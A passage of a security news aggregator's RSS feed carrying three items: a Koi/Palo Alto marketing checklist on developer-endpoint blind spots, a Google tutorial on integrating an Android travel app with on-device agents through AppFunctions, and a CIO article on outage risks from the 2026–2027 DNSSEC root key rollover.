<p class="wp-block-paragraph">Your existing asset management tracks binaries and installers, but it cannot see local VS Code extensions, MCP servers, or ad-hoc Python scripts running on developer endpoints. This visibility gap was recently exposed by the <a href="https://www.koi.ai/blog/maliciouscorgi-the-cute-looking-ai-extensions-leaking-code-from-1-5-million-developers" target="_blank" rel="noreferrer noopener">MaliciousCorgi campaign</a>, where two marketplace extensions with 1.5 million combined installs silently harvested every file a developer opened. Neither triggered any detection because they were not binaries, not executables, not anything your inventory was built to flag. To counter this, Koi closes the gap by analyzing what extensions actually do after installation, exposing hidden data-harvesting channels running inside your active workspace.</p>



<p class="wp-block-paragraph"><strong>#2. Distinguish between human and autonomous agent behavior </strong></p>



<p class="wp-block-paragraph">When a rogue AI agent exfiltrates your proprietary source code, it uses a developer’s valid credentials during normal working hours, making the session look entirely legitimate to standard XDR baselines. Moving beyond static permission lists, Koi deploys behavioral profiling within the workspace runtime. By actively intercepting unauthenticated background tasks and blocking unauthorized file-system reads, it stops automated data exfiltration in real time.</p>



<p class="wp-block-paragraph"><strong>#3. Establish guardrails for automated package updates on endpoints</strong></p>



<p class="wp-block-paragraph">Developers prioritize speed, often allowing software packages to auto-update on their endpoints the moment a new version appears. Attackers weaponize this supply chain vulnerability, as seen in the May 2026 Team PCP attack where 3,800 GitHub repositories were compromised in just 36 minutes via poisoned auto-updates. Securing agentic endpoints against these rapid breaches requires behavior-based inspection within the active workspace context. Koi operates at this layer by providing safe deployment buffers that automate version cooldowns, blocking bleeding-edge updates until they are vetted. By continuously auditing process creation within the IDE runtime, Koi instantly drops unauthorized remote connections before malicious payloads can exfiltrate credentials from the endpoint.  </p>



<p class="wp-block-paragraph"><strong>#4. Enforce principle of least privilege for AI agents</strong></p>



<p class="wp-block-paragraph">AI coding assistants inherit the privileges of whoever deployed them. In practice, that means read access to production databases, write access to core repositories, and access to every secret in environment files and configuration directories. To restrict this excessive access, Koi applies dynamic sandboxing directly to AI agent processes at the kernel level. It enforces a strict zero-trust boundary that segregates sensitive workspace vectors, preventing agents from pulling data outside their approved scope without interrupting developer workflows.</p>



<p class="wp-block-paragraph"><strong>#5. Maintain continuous endpoint posture management</strong></p>



<p class="wp-block-paragraph">Signature-based scanning only stops known threats. Sophisticated repository attacks often arrive as functional, high-rated software that carries no known bad signature. Koi’s research into the <a href="https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers" target="_blank" rel="noreferrer noopener">DarkSpectre campaign</a> found eight browser extensions, all carrying “featured” badges from Google and Microsoft, installed by over 8 million users, silently harvesting every conversation from ChatGPT, Claude, and Gemini in the background. Koi addresses this by operating upstream: scanning marketplace listings every hour, using LLM-driven code analysis to compare what software promises against what its code does, sandboxing it, and scoring the risk before it ever reaches the endpoint.</p>



<p class="wp-block-paragraph"><strong>Summary</strong></p>



<p class="wp-block-paragraph">Securing the modern enterprise is no longer about patching individual gaps. As AI agents redefine the workforce, Agentic Endpoint Security (AES) is now a strategic imperative for every CISO. By establishing a mandatory control plane for the AI-native workspace, AES ensures that your organization can scale engineering velocity without ever compromising enterprise integrity. </p>



<p class="wp-block-paragraph">Ready to secure the future of your software stack? See how <a href="https://www.paloaltonetworks.com/cortex/agentic-endpoint-security" target="_blank" rel="noreferrer noopener">Koi Agentic Endpoint Security</a> delivers complete visibility, risk scoring, and real-time prevention across every endpoint in your enterprise.</p>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Build intelligent Android apps: Integrate into Android's intelligence system using AppFunctions]]></title>
<description><![CDATA[Posted by Ben Weiss, Senior Developer Relations Engineer, Android Developer RelationsWelcome back to the blog post series "Build intelligent Android apps" where we take a basic Android app and transform it into a personalized, intelligent, and agentic experience. In our previous post, we explored...]]></description>
<link>https://tsecurity.de/de/3693499/android-tipps/build-intelligent-android-apps-integrate-into-androids-intelligence-system-using-appfunctions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693499/android-tipps/build-intelligent-android-apps-integrate-into-androids-intelligence-system-using-appfunctions/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:27 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi961epgT3N_Za_k2-pCJ30tegn7DM-Umh1LWh7Q4NxhryR5H57JB00zKQcek56ccAvEM95i6wyXWWCZZ7486_Gq1ewxPHtsMY13UVsVTmndAvkOJtHPjUXuZ3XW_yBEFtlOr2ocBFIKr0PCRZhIRs67h6bX6zDKihwcxQs8bGbYTqIp5azuBKcX4PNMMY/s2469/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Meta.png"><p></p><p><i>Posted by Ben Weiss, Senior Developer Relations Engineer, Android Developer Relations</i></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi92OFxAOxVMpResmBcBoUfxzgcMmVOMn3mXQabB9O-xkC7pjYxrvXS7YLTEWLIBstwuDLc0ePCC-Tf7AKq62mgAXjSYg9-VUIjKvokK6BhGHqPDSXCTQowbpj40plsP3V3Ju3ck4gzNdJmGQ6C1-twuob2UnPu7oY9B_oSwnYSkaif7lSEMwFnStzWknM/s8583/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Blog.png"><img border="0" data-original-height="2601" data-original-width="8583" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi92OFxAOxVMpResmBcBoUfxzgcMmVOMn3mXQabB9O-xkC7pjYxrvXS7YLTEWLIBstwuDLc0ePCC-Tf7AKq62mgAXjSYg9-VUIjKvokK6BhGHqPDSXCTQowbpj40plsP3V3Ju3ck4gzNdJmGQ6C1-twuob2UnPu7oY9B_oSwnYSkaif7lSEMwFnStzWknM/s1600/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Blog.png"></a></div><br><p><br></p><p>Welcome back to the blog post series "<a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html" target="_blank">Build intelligent Android apps</a>" where we take a basic Android app and transform it into a personalized, intelligent, and agentic experience. In our <a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html">previous post</a>, we explored how to leverage Firebase AI Logic to build cloud-hosted and hybrid AI features.</p>Traditional mobile UIs excel at focused, hands-on tasks, and the Android intelligence system is introducing complementary features to make complex, multi-step actions even easier. By supplementing traditional user interfaces, AppFunctions provide a powerful new entry point: A privileged agent on the device can access app features in the background. This can be particularly helpful when users are driving, walking or otherwise multitasking. 

<p>In this article, we'll show you how we designed and integrated these capabilities into our travel planning app, <a href="https://github.com/android/ai-samples/tree/main/jetpacker">JetPacker</a>, using Android AppFunctions. We'll explore the rationale behind our feature choices, discuss the specialized tooling we used to accelerate development, and dive into the code that makes it all work.</p>

<h2>Designing AI-ready features: making choices that matter for your users</h2>

<p>To select which features to provide to the intelligence system, we looked for tasks where a voice or text command is objectively faster than tapping through screens. In this side-by-side screen recording you can see this contrast perfectly: on the left, a user tapping through multiple screens to log an expense; on the right, the same task completed instantly in the background via a privileged agent.</p>

<div class="vertical-video-grid">
  <div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIr2ssY2GiOlBmFzcP-91j91VjH9QX_sOP8FcmtirYPyXZmYRzNJmfqI_GT6aXYXye8-ntylv-gTNu1Qlnbx5gHiFn9naHqt7tJOQBA3HpQ5uz8XRdavXh7b3IP3FzJb4SsbC4mClGLUHupDwIeE9Du3PNRQr0SGs2lgHZTdHXnv8TagNBRtoJsbpeE6c/s960/Comp%201.gif"><img border="0" data-original-height="540" data-original-width="960" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIr2ssY2GiOlBmFzcP-91j91VjH9QX_sOP8FcmtirYPyXZmYRzNJmfqI_GT6aXYXye8-ntylv-gTNu1Qlnbx5gHiFn9naHqt7tJOQBA3HpQ5uz8XRdavXh7b3IP3FzJb4SsbC4mClGLUHupDwIeE9Du3PNRQr0SGs2lgHZTdHXnv8TagNBRtoJsbpeE6c/s1600/Comp%201.gif"></a></div><br><div class="vertical-video-wrapper"><br></div>

<p>Our first choice was expense tracking. Logging a coffee expense during a trip usually takes quite a few taps—unlocking the phone, opening the app, finding the active trip, navigating to the expenses tab, tapping the add button, taking a picture of the receipt, and checking the result. By providing the <code>addExpense</code> and <code>getExpenses</code> features as AppFunctions, the system agent handles the heavy lifting. When the user says, "Add a five-dollar coffee expense to my Paris trip," the agent automatically searches for the correct trip ID in the background and inserts the expense, skipping the manual UI flow entirely.</p>

<p>We also prioritized itinerary management. Finding what activity is next on a busy trip itinerary usually requires scrolling through a dense timeline view. By providing <code>getItinerary</code> and <code>addItineraryEvent</code> to the system, the user can simply ask, "What am I doing next in Paris?" and get an immediate answer.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRduisOXPFs0o2m-JwtESU1fUEanqH-A0eGt58MUuXs-vgN1af77M-j3ETdegzulBq-3TClrDvhO2K_8q4ep8xAlnW1y5T09ZxxHyZmTRtftA9DOmIk7ykfM_JihQ2c2fcUbEA-jCO1sgW2JnxN9qtB8IS58lbQoaIk4cPJPuPQavZNUoW2rNKo9r8g9M/s960/Comp%202.gif"><img border="0" data-original-height="540" data-original-width="960" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRduisOXPFs0o2m-JwtESU1fUEanqH-A0eGt58MUuXs-vgN1af77M-j3ETdegzulBq-3TClrDvhO2K_8q4ep8xAlnW1y5T09ZxxHyZmTRtftA9DOmIk7ykfM_JihQ2c2fcUbEA-jCO1sgW2JnxN9qtB8IS58lbQoaIk4cPJPuPQavZNUoW2rNKo9r8g9M/s1600/Comp%202.gif"></a></div><br><p><br></p>
  

<p>Finally, we focused on hands-free note capturing. Typing out reminders or notes while walking down a busy street is difficult and unsafe. Exposing a voice note capability allows the user to say, "The flight was amazing, I saw a beautiful sunset and managed to sleep well," and the privileged agent automatically transcribes and saves it directly into the travel database <span face="Roboto, sans-serif"> using the </span><span>addVoiceNote</span><span face="Roboto, sans-serif"> AppFunction.</span></p>

<h2>Android MCP powered by AppFunctions</h2>This entire experience is built on Android MCP. Under this design, the app acts as a local MCP server. Rather than remote APIs, you provide your app features directly to the on-device intelligence system.<br><br><a href="https://d.android.com/ai/appfunctions">Android AppFunctions</a> is the API that brings this concept to life. It reads annotated Kotlin functions and compiles them into type-safe, sandboxed tool definitions that the privileged agent can discover and invoke locally on the device.<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjypEvh8lAK1myAWpnG4A0TtdIaTxP69t7g9croAJSUZ2Od6AEkhwMusN3CvdGohdvYzoh1UaCxCHb22oJzCD_4B2K8vfQzcyAIaTl8lk3TCR9T0SoMHjjaDk4GMxxPazeCfT0aF7rifm7-LAvcMhyphenhyphenryDJpOPYon7jiISKB2sMLzAwHDuKFxIv16sDXjrM/s2500/Android%20MCP%20diagram.png"><img border="0" data-original-height="1406" data-original-width="2500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjypEvh8lAK1myAWpnG4A0TtdIaTxP69t7g9croAJSUZ2Od6AEkhwMusN3CvdGohdvYzoh1UaCxCHb22oJzCD_4B2K8vfQzcyAIaTl8lk3TCR9T0SoMHjjaDk4GMxxPazeCfT0aF7rifm7-LAvcMhyphenhyphenryDJpOPYon7jiISKB2sMLzAwHDuKFxIv16sDXjrM/s1600/Android%20MCP%20diagram.png"></a></div><br><p><br></p>

<p><br></p><p><br></p><p><br></p><p><br></p><p><br></p><i><div><i>Diagram highlighting our apps, the android platform, and system agents coordinate AppFunctions.</i></div></i><p>Under the Android MCP model, your app acts as a local MCP server that exposes structured tools, while the Android platform serves as the central tool registry. On the MCP client side, agent apps are registered with the intelligence system after being granted system-privileged permissions to access the registry.</p>

<p>When a user interacts with a registered agent, its LLM determines if the request can be handled by an AppFunction, queries the platform's metadata, and executes the appropriate registered functions in the background. This local MCP client-server design gives you full control: you choose exactly which features are accessible to the agent, keeping the rest of your app's data private.</p>

<h2>How we accelerated development with Android skills</h2>

To streamline the integration process, we leveraged the <a href="https://github.com/android/skills/tree/main/device-ai/appfunctions">AppFunctions development skill</a>. The AppFunctions development skill is a complete development companion. It guided us through the entire lifecycle: mapping Kotlin data classes to serialize parameters, generating the necessary <code>Service</code> entry points, refining our <code>KDoc</code> documentation to ensure the LLM understands parameter boundaries, and setting up automated testing using ADB.

<h2>Providing app features to the intelligence system</h2>

<p>Enough with the theory, let's dive into the implementation.</p>

<h4>Configuration and dependency setup</h4>

<p>We begin by adding the AppFunctions dependencies. One for the API and one for the Kotlin Symbol Processing compiler.</p>

<pre><code>implementation("androidx.appfunctions:appfunctions:1.0.0-alpha10")
ksp("androidx.appfunctions:appfunctions-compiler:1.0.0-alpha10")</code></pre>

<h4>Modeling custom data types</h4>

<p>Any custom object exchanged with the agent must be annotated with <code>@AppFunctionSerializable</code>. In our <a href="https://github.com/android/ai-samples/tree/main/jetpacker/android/feature/appfunctions/src/main/java/com/example/jetpacker/feature/appfunctions/TripSerializable.kt">TripSerializable.kt</a> file, we define our trip data model:</p>

<pre><code>@AppFunctionSerializable(isDescribedByKDoc = true)
data class TripSerializable(
    /** The trip's unique identifier. */
    val id: String,
    /** The trip's title. */
    val title: String,
    /** The trip's destination location. */
    val location: String,
    /** The trip's start date in milliseconds. */
    val startDate: Long,
    /** The trip's end date in milliseconds. */
    val endDate: Long,
    /** A list of participants. */
    val participants: List&lt;String&gt;,
)</code></pre>

<h4>Providing features using the @AppFunction annotation</h4>

<p>Next, the skill wrote the Kotlin functions that perform the database queries and annotate them with <code>@AppFunction</code>. We can view this in searchTrip:</p>

<pre><code>/**
 * Looks for trips based on optional filters like id, title (name), location, and dates.
 *
 * @param id The unique identifier of the trip.
 * @param title The title or name of the trip.
 * @param location The destination location.
 * @param startDate The minimum start date in milliseconds.
 * @param endDate The maximum end date in milliseconds.
 * @return A list of trips matching the filters.
 */
@AppFunction(isDescribedByKDoc = true)
suspend fun searchTrip(
    id: String? = null,
    title: String? = null,
    location: String? = null,
    startDate: Long? = null,
    endDate: Long? = null
): List&lt;TripSerializable&gt; {
    return withContext(Dispatchers.IO) {
    // implementation
}</code></pre>

<p>Since AppFunctions run on the UI thread by default, we use <code>withContext(Dispatchers.IO)</code> to switch to a background dispatcher. Additionally, we refine our KDoc to use clear, imperative verbs and specify parameter constraints. This documentation compiles directly into the tool's schema, which the privileged agent uses to resolve parameters and handle runtime errors.</p>

<h4>The service entry point and Hilt integration</h4>

<p>To register these features with the intelligence system, we create an abstract base class that extends <code>AppFunctionService</code>. We annotate it with <code>@AppFunctionServiceEntryPoint</code>:</p>

<pre><code>@RequiresApi(36)
@AndroidEntryPoint
@AppFunctionServiceEntryPoint(
    serviceName = "JetPackerAppFunctionService",
    appFunctionXmlFileName = "jetpacker_app_function_service"
)
abstract class BaseJetPackerAppFunctionService : AppFunctionService() {
    @Inject internal lateinit var tripDao: TripDao
    // DAOs and database references are injected here...
}</code></pre>

<p>During compilation, KSP generates the final concrete service subclass, <code>JetPackerAppFunctionService</code>, as declared with the <code>serviceName</code> parameter. We also register <code>app_metadata.xml</code> in the app's manifest. This file provides global operational rules for JetPacker's declared AppFunctions.</p>

<h2>Testing and verifying your AppFunctions</h2>

<p>Once implemented, you should verify that your AppFunctions are registered and working correctly.</p>

<p>Running devices or emulators with Android 17 or newer, you can use ADB commands from your terminal to list and invoke your functions. Running <code>adb shell cmd app_function list-app-functions</code> displays all registered functions for your package. You can then execute a specific function and test its database integration by running <code>adb shell cmd app_function execute-app-function</code> while passing a raw JSON parameters string.</p>

<p>Instead of these ADB commands, you can also use the <a href="https://github.com/android/appfunctions">AppFunctions Testing Agent</a> to inspect your configuration, list and execute AppFunctions, and even see how your AppFunctions behave in a real conversational flow.</p>

<h2>Wrapping it up</h2>

<p>When thinking about app features that can be contributed to the intelligence system using AppFunctions requires a slight shift in how we think about code and documentation. AppFunctions enable you to use this new interaction model for apps, which allows using an agent to access app features..</p>

<p>First, the <a href="https://github.com/android/skills/tree/main/device-ai/appfunctions">AppFunctions development skill</a> is an essential lifecycle tool, helping you discover features, implement and refine AppFunctions for your apps. Second, KDoc comments are a compiled API asset; clear parameter descriptions directly impact the execution accuracy of the system agent. Finally, Android MCP provides local-first execution allowing apps to safely collaborate with AI agents.</p>

<p>Contributing app features through AppFunctions makes your application ready for the intelligence system. Let us know how you are adapting your apps for the agentic era!</p>

<h2>Learn more</h2>

<p>Check out the other parts of this blog post series:<br><b><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html">Part 1:</a></b> Introduction of the app and a high-level overview.<br><a href="http://android-developers.googleblog.com/2026/07/android-on-device-inference.html"><b>Part 2:</b></a> On-device intelligence. Deep-dive into ML Kit’s GenAI APIs and Gemini Nano to build privacy-first features like itinerary summarization, receipt parsing, and local audio processing.<br><b><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html">Part 3:</a></b> Hybrid and cloud reasoning. Explore how to use Firebase AI Logic to ground LLM answers in real-world data like Google Maps and web context.<br><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-appfunctions.html"><b>Part 4 (this post!):</b></a> System integration. Integrating with the Android intelligence system using AppFunctions. <br>Part 5 (coming soon): In-app agentic workflows. Extend the app with an end-to-end booking assistant powered by A2UI and ADK.</p>

<p>Interested in more on Android Development? Follow Android Developers on <a href="https://www.youtube.com/@AndroidDevelopers">YouTube</a> or <a href="https://www.linkedin.com/showcase/androiddev/">LinkedIn</a>!</p>

<p>
  All code snippets in this blog post follow the following copyright notice:
</p>
<pre><code>Copyright 2026 Google LLC.
SPDX-License-Identifier: Apache-2.0</code></pre></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CIOs beware: DNS KSK rollover could kick off wave of mysterious outages]]></title>
<description><![CDATA[Predicting an outage is tricky business, but CIOs might want to circle Oct. 11, 2026, through Jan. 11, 2027, for likely trouble of a potentially widespread and puzzling nature.



That’s because a relatively trivial update to DNSSEC on Oct. 11, one that will take full effect by Jan. 11, is likely...]]></description>
<link>https://tsecurity.de/de/3693085/it-nachrichten/cios-beware-dns-ksk-rollover-could-kick-off-wave-of-mysterious-outages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693085/it-nachrichten/cios-beware-dns-ksk-rollover-could-kick-off-wave-of-mysterious-outages/</guid>
<pubDate>Sat, 25 Jul 2026 06:16:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Predicting an outage is tricky business, but CIOs might want to circle Oct. 11, 2026, through Jan. 11, 2027, for likely trouble of a potentially widespread and puzzling nature.</p>



<p class="wp-block-paragraph">That’s because a relatively trivial update to DNSSEC on Oct. 11, one that will take full effect by Jan. 11, is likely to deliver a series of seemingly unrelated system outages. This will come from oceans of dependencies from third-party, shadow, agentic, gen AI, SaaS, homegrown, and legacy apps — among many other quiet executable hiding spots, including virtual environments and containers.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/joshithak/">Sai Joshitha Kathari</a>, senior site reliability engineer at payment card giant Visa, says most enterprises have far more DNS-related exposure than they realize because of these many dependencies.</p>



<p class="wp-block-paragraph">“This has the potential to create real downstream destruction when unresolved failures sit underneath important business functions,” Kathari says. </p>



<p class="wp-block-paragraph">The danger is that so many of these issues are either unknown to IT or handled by a third-party vendor and no one in IT has had reason to ask those vendors about DNS updates. </p>



<p class="wp-block-paragraph">“The risky areas are usually not the obvious managed DNS services. They are the older internal applications, hardcoded resolvers, containerized workloads, sidecar configurations, custom scripts, partner integrations, VM images, stale base images, and service-to-service dependencies that nobody has touched in a long time,” Kathari explains. “These systems can keep working quietly for years, then fail during a DNS or certificate-related change because they bypassed the normal platform standards.”</p>



<p class="wp-block-paragraph">Independent technology analyst <a href="https://www.linkedin.com/in/carmi/">Carmi Levy</a> says that CIOs need to take this event very seriously. </p>



<p class="wp-block-paragraph">“The two-pronged deadline — October 11, 2026, when the new Key Signing Key (KSK) begins signing the root zone, and January 11, 2027, when the old key is retired — should be marked in red on everyone’s calendar, just as December 31, 1999, once was,” Levy says. “Failure to comply could result in websites, critical business applications, and related resources dropping off the face of the Earth once the transition is complete.”</p>



<p class="wp-block-paragraph">Levy adds: “Custom-built code that lives outside conventional support mechanisms may or may not function when the DNS changes go into effect.”</p>



<p class="wp-block-paragraph">The <a href="https://www.icann.org/resources/press-material/release-2026-05-20-en">DNSSEC update itself</a> is straightforward, but it is also the first significant DNSSEC change — specifically a change in the trust anchor — since 2018. </p>



<p class="wp-block-paragraph">The rollout statement noted that “the trust anchor is formally known as the Domain Name System Security Extensions (DNSSEC) root zone Key Signing Key (KSK). The KSK is the cryptographic key at the core of the DNSSEC trust anchor and is used to verify that DNS responses are legitimate and have not been modified in transit.”</p>



<h2 class="wp-block-heading">Expect nearly every enterprise to be impacted</h2>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/kimdavies/">Kim Davies</a>, vice president of IANA Services and president of public technical identifiers at ICANN, says the extent of the impact on enterprises is unknowable, given the nature of shadow IT and other edge cases. </p>



<p class="wp-block-paragraph">But based on the massive number of dependencies both known and unknown in the typical global enterprise, Davies guesses that just about every enterprise will be impacted, to varying degrees. </p>



<p class="wp-block-paragraph">“In highly complex organizations, it is very likely there will be some impact in the corners, in the margins, of the organization,” Davies tells CIO. “DNS is such a core technology that underpins everything.”</p>



<p class="wp-block-paragraph">As the updates propagate, hiccups will materialize, Davies notes. “When the system cannot validate the [DNS] information, it will treat it as suspect and DNS lookups will fail.”</p>



<p class="wp-block-paragraph">Visa’s Kathari says, “Enterprises should expect some secondary DNS-related glitches when major DNSSEC-related changes happen, not necessarily because the core infrastructure teams will ignore the update, but because large environments have many hidden dependency paths.”</p>



<p class="wp-block-paragraph">Making this problem far worse, Kathari notes, is that the glitches will likely initially look like anything other thana DNS glitch. That will force IT staff to waste a vast number of hours chasing causes that ultimately prove to be unrelated to the incidents. </p>



<p class="wp-block-paragraph">“The impact for CIOs is that DNS failures rarely announce themselves as DNS failures. They look like application timeouts, broken logins, failed API calls, queue lag, payment failures, partner connectivity issues, or random regional instability,” Kathari explains. “That makes troubleshooting slower because teams may spend hours looking at the application, database, network, or cloud provider before realizing name resolution is part of the failure path.”</p>



<p class="wp-block-paragraph"><a href="https://greyhoundresearch.com/svg/">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, agrees that IT will likely spin its wheels chasing the wrong ghosts.</p>



<p class="wp-block-paragraph">“A validation failure rarely stays in its lane. It surfaces as an application error, an API timeout, or a reachability problem, which turns a resolver fault into a coordination failure,” Gogia says. “The application team blames the network, the network team blames the cloud, and the user simply watches work stop.”</p>



<p class="wp-block-paragraph">“Images and templates are the frontier most teams miss,” Gogia adds. “A resolver fixed in summer can be broken again in October the instant a stale golden image is redeployed, because automation no longer lets configuration drift slowly. It restores yesterday’s assumptions at machine speed.”</p>



<p class="wp-block-paragraph">It is widely expected that enterprises will not have any problems executing the change or, more likely, relying on their hyperscalers to properly handle the change. That is the concern. </p>



<p class="wp-block-paragraph">“CIOs are being distracted so much with AI and this is such a deep in the weeds infrastructure issue that this can and willcatch people off-guard,” <a href="https://acceligence.com/talent/profiles/justin-greis/">Justin Greis</a>, CEO of consulting firm Acceligence, tells CIO. “I think we’ll see a meaningful number of enterprise disruptions associated with the DNSSEC trust anchor rollover. Not because the update itself is especially difficult, but because it will expose weaknesses that already exist inside many organizations.”</p>



<p class="wp-block-paragraph">Most enterprise IT operations have had no reason to compile a comprehensive list of all DNS dependencies, but many will be instantly discovered in January. </p>



<h2 class="wp-block-heading">Potentially widespread fallout</h2>



<p class="wp-block-paragraph">A major retailer, for example, might suddenly be unable to connect with FedEx to arrange for deliveries or a hospital may find that test results are no longer being shared with patient portals. It might manifest as an assembly line that halts because an IIoT component can no longer share files with its vendor system or a truck fleet that stops being tracked. </p>



<p class="wp-block-paragraph">“There will almost certainly be systems that fall through the cracks. Some will be legacy applications that rely on outdated DNS configurations that have not been updated in years,” Greis says. “Others will be business-unit-developed tools, contractor-built solutions, embedded systems, manufacturing and industrial systems, or highly customized workloads that operate outside normal IT oversight. These are the types of systems that often surface during infrastructure events like this.”</p>



<p class="wp-block-paragraph">Greis adds that many enterprises will discover in January problems created by their own automation.</p>



<p class="wp-block-paragraph">“Over time, enterprises build layers of processes, templates, and deployment mechanisms that are reused across teams and environments,” Greis notes. “Even after DNS infrastructure is updated correctly, older settings can inadvertently be reintroduced through routine updates and system changes, creating intermittent and difficult-to-diagnose failures.”</p>



<p class="wp-block-paragraph">The good news from this situation is that enterprises are not going to likely lose all DNS access if any of these glitches occur. But that may be of no comfort because even if the disruptions are only with small edge cases, that can still cause massive operational disruptions.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/cricketliu/">Cricket Liu</a>, EVP and chief evangelist at Infoblox, gives the example of a DNS server that responds to factory-floor system queries.</p>



<p class="wp-block-paragraph">“Or let’s say this disrupts [an enterprise’s key] SaaS application. All name resolution may stop and it will show a server failure. It will not deliver a response whenever I look anything up. That’s not subtle at all,” Liu says. “It’s highly likely that companies are going to see some effects.”</p>



<p class="wp-block-paragraph">Back in 2017, the switchover was relatively uneventful, giving some CIOs hope that January 2027 will also be a non-event. But given the technology advancements in the last 10 years and the resulting tidal wave of new enterprise tech dependencies, few are realistically expecting no problems this go around. </p>



<h2 class="wp-block-heading">Impossible to predict what will happen</h2>



<p class="wp-block-paragraph">One of the top network experts on DNS effects in enterprises is <a href="https://blog.apnic.net/author/geoff-huston/">Geoff Huston</a>, chief scientist at the Asia Pacific Network Information Centre (APNIC), the regional Internet Registry administering IP addresses for the Asia Pacific region.</p>



<p class="wp-block-paragraph">Huston says it is difficult to project what will happen in January until it happens.</p>



<p class="wp-block-paragraph">“Just like the last time, we are flying blind with this key roll. Because nothing really terrible happened last time, there is some confidence that nothing terrible will happen this time, but we just can’t tell in advance as there are no good measurement approaches that allow us to peek inside the trust state of recursive resolvers,” he says.</p>



<p class="wp-block-paragraph">As for potential edge-case glitches, Huston says it is possible, but if third-party vendors do not properly handle the update, there will be other issues as well, as the KSK cryptographic key used within DNSSEC signs and validates the keys that protect DNS records. </p>



<p class="wp-block-paragraph">“If it is not standards-compliant, then you have more problems than just the KSK roll,” Huston says, “as it raises the obvious question of ‘What else is not correctly implemented in the DNS resolver that I’m running?’”</p>



<p class="wp-block-paragraph">As a silver lining, Acceligence’s Greis says any hiccups that result from the DNS KSK update may be a gift in disguise for CIOs. </p>



<p class="wp-block-paragraph">“The irony is that some of the most business-critical components in the technology stack are often the least visible because they work in the background,” Greis says. January “may reveal how much modern business resilience depends on infrastructure that many organizations rarely examine until something breaks. For CIOs, that’s the real lesson. This is not fundamentally a story about a DNS update. It is a story about operational visibility, resilience, and governance. Organizations that treat the rollover as a routine infrastructure task will likely complete the update and move on. Organizations that use it as an opportunity to understand and strengthen the foundations of their technology environment may gain far more value than simply avoiding an outage.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[5 endpoint blind spots your EDR/XDR was never built to see]]></title>
<description><![CDATA[In August 2025, 126 malicious packages landed in the npm registry. Even after the community caught the initial wave, 80 of these hidden backdoors remained actively listed.



That was enough. Over 86,000 downloads. Malicious code in PhantomRaven, packages running in the production systems of Fort...]]></description>
<link>https://tsecurity.de/de/3692679/it-nachrichten/5-endpoint-blind-spots-your-edrxdr-was-never-built-to-see/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692679/it-nachrichten/5-endpoint-blind-spots-your-edrxdr-was-never-built-to-see/</guid>
<pubDate>Sat, 25 Jul 2026 00:18:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In August 2025, 126 malicious packages landed in the npm registry. Even after the community caught the initial wave, 80 of these hidden backdoors remained actively listed.</p>



<p class="wp-block-paragraph">That was enough. Over 86,000 downloads. Malicious code in <a href="https://www.koi.ai/blog/phantomraven-npm-malware-hidden-in-invisible-dependencies" target="_blank" rel="noreferrer noopener">PhantomRaven</a>, packages running in the production systems of Fortune 500 companies worldwide. And throughout the entire window, not a single EDR/XDR alert.</p>



<p class="wp-block-paragraph">This happened because the attack surface has expanded to a layer EDR/XDR was never designed to see: VS Code extensions, local MCP servers, and rogue AI coding assistants that inherit your engineers’ valid credentials to steal data at machine speed.</p>



<p class="wp-block-paragraph">To eliminate this structural vulnerability, Palo Alto Networks acquired Koi, an AI-native developer security product engineered for proactive, precision enforcement. Below we compiled a 2026 CISO checklist you can use to audit your environment and see how Koi automates each defense from day one.</p>



<p class="wp-block-paragraph"><strong>#1. Gain real-time visibility into shadow AI &amp; extensions</strong></p>



